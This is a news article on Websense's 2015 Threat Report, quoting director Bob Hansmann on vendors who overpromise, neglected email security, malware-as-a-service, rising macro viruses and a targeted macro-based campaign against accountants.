An official of an IT security vendor admits the industry still isn’t doing a good enough job of meeting the threats of attackers against organizations.
“I think a lot of them have failed by overpromising what their products can do,” Bob Hansmann, director of product security at Websense Inc., said as the company released its 2015 Threat Report, which — like other vendors annual reports — shows more bad news.
He added that “a lot of companies are spending so much more on marketing than they are on development. There’s quite a few vendors in our industry — young startups, many of them — whose product hasn’t advanced all that much, but their marketing is fantastic.”
The Websense report also comes a day after more details leak out about one of the most damaging attacks against the U.S. government, in which CNN says suspected Russian hackers of the unclassified White House network accessed last year included President Obama’s daily schedule.
Hansmann also didn’t let organizations off the hook, complaining many IT teams are so focused on identifying malware they haven’t re-evaluated their email defences.
That means a lot when, as Websense has found, overall volume of threats were down five per cent but email threats were up 25 per cent.
“One of the biggest weaknesses out there is email security,” he said “where very few vendors have been doing investment, and customers have been happy with the status quo. And we (the security industry) have to take some blame for this because we’ve been telling them ‘Hey, don’t worry about email because everything’s got links in it.'” So security vendors are focusing on Web threats.
“We did such a good job (IT) people are ignoring email, so the bad guys are going after that uncared for channel.”
Hansmann was responding to questions about why breaches continue to rise when organizations shell out billions of dollars a year on IT security products. Websense found that “cyber threat actors around the globe grew to staggering proportions in 2014.”
Perhaps the most alarming trend, the report added, was that three percent of malicious file samples showed a unique combination of attributes not common across other malicious file groups. This presents a ‘Zero-day’ risk to sandboxing defenses that may not recognize the behaviors in their new, unique sequence and contexts, the report says. “The key takeaway here is that sandboxing has its limitations and must be augmented with other detection methods for a higher probability of detection.”
There are good and bad IT teams, Hansmann added, just as there are good and bad vendors. “In the end all a business or government agency can do is make sure they’ve got the right teams with the right background and are properly funded do go and due their due diligence and (for boards) stop asking them to buy the latest thing they read in a magazine.”
In its report, which analyses anonymized customer data from Websense appliances, the company concluded that the number of hackers is growing because of their to rent and assemble attack packages.
It’s an era of Malware-as-a-Service that has lowered the barriers to entry. Almost all malicious files examined used a command and control URL for botnets that had been previously used by one or more other malware samples, the report notes.
This is why the average price for exploit kits is usually between $800-$1500 a month, depending on the features and add-ons.
“In spite of law enforcement, national Computer Emergency Response Teams (CERTs), security vendors and the security community as a whole collecting and disseminating Indicators of Compromise (IOC), the weaponization of malicious tools continues,” the report says. “We expect the level of sophistication that we observe in the threat landscape to continue to rise.”
While new ways of penetrating defences are being found, old ways are being recycled. For example, macro viruses are on the rise. Websense identified over three million macro-embedded email attachments in just the last 30 days of 2014.
As reported by other IT vendors, hackers are narrowing their threats to specific people in organizations. For example, Websense notes one attack targeted fewer than 100 accountants in the financial services, using a blend of techniques that took advantage of their daily reliance on macros within documents and spreadsheets.
They received a tailored email with an attached Microsoft Word document. A macro contacted a website to download an executable that opened a backdoor into the user’s PC.
Just to be sure, a second campaign was sent to those accountants the next day, with things like the sender and subject changed.